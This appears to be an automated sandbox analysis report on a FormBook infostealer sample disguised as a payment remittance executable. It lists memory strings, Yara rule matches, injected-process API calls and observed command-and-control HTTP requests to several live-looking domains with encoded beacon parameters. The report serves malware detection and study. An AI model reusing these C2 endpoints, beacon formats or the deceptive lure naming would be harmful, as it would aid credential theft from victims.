          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213811208.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-O6d
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/0O
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/;O$dh
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/HO
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213811208.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/It
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/VO
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214195042.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0nl
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/eOndo
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213925578.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/0O
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/lOyd
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213925578.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/lOyd
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214195042.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213811208.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ty
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213284821.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.micro(D.df
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr2K
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr8
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212459989.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krQK
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213130693.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213161728.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnrsCI
          Source: raserver.exe, 00000013.00000002.479062532.0000000004DE2000.00000004.00020000.sdmpString found in binary or memory: https://www.johnharrisagent.com/uytf/?4hax=1GgOydTR9rFB1tFiaPZsKtEWQf/ik/nrf61jzTsng/4mIf33LxMFmIGp7
          Source: unknownDNS traffic detected: queries for: www.yummyblockparty.com
          Source: global trafficHTTP traffic detected: GET /uytf/?4hax=Z6tv0ZGri8uWurB8AUDeWgq8Hn78EURDlDEEMIHUNMQGUG9NVGnXX5+ZYyjQXpOA0JMU&6lE=xT6Pc HTTP/1.1Host: www.yummyblockparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uytf/?4hax=1GgOydTR9rFB1tFiaPZsKtEWQf/ik/nrf61jzTsng/4mIf33LxMFmIGp7DtpN0+eCTBT&6lE=xT6Pc HTTP/1.1Host: www.johnharrisagent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uytf/?4hax=Lw8pQUl/qe2gQHW8JEklnfX9vlL4ErZAhlphDfsrttl8uYXfrtRE5waSCzthMEOsFHNR&6lE=xT6Pc HTTP/1.1Host: www.itsready.supportConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uytf/?4hax=0R01lDMz+xXIWoinSyO5qQyNMJHeVacFioz47MHPNe7DMd9wx+TtySfTu0uIVXra7tyR&6lE=xT6Pc HTTP/1.1Host: www.btt5204.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.225993143.0000000000BBB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: initial sampleStatic PE information: Filename: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          .NET source code contains very large stringsShow sources
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, ConsoleGame/Form1.csLong String: Length: 50988
          Source: 1.0.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.3c0000.0.unpack, ConsoleGame/Form1.csLong String: Length: 50988
          Source: 1.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.3c0000.0.unpack, ConsoleGame/Form1.csLong String: Length: 50988
          Source: 5.0.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.8a0000.0.unpack, ConsoleGame/Form1.csLong String: Length: 50988
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.8a0000.1.unpack, ConsoleGame/Form1.csLong String: Length: 50988
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 1_2_04890040
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 1_2_0489003F
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_00401030
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_0041D179
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_0041C1D0
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_0041C9FF
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_0041CA0B
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_00408C7B
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_0041C4CC
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_00408C80
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_0041BDE3
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_00402D87
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_00402D90
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_0041C5B7
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_00402FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481D466
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04750D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048225DD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04822D07
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04821D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04776E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04822EF7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481D616
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0482DFCE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04821FF1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048220A8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A830
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048228EC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0482E824
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047820A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476B090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04774120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475F900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048222AE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0480FA2B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477AB40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481DBD2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048103DA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04822B28
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478EBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0071D179
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0071C9FF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0071C1D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0071CA0B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_00708C7B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0071C4CC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_00708C80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0071BDE3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_00702D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_00702D87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_00702FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0475B150 appears 72 times
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_0041868A NtReadFile,
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_0041870A NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047995D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047996D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799560 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0479AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047995F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799670 NtQueryInformationProcess,
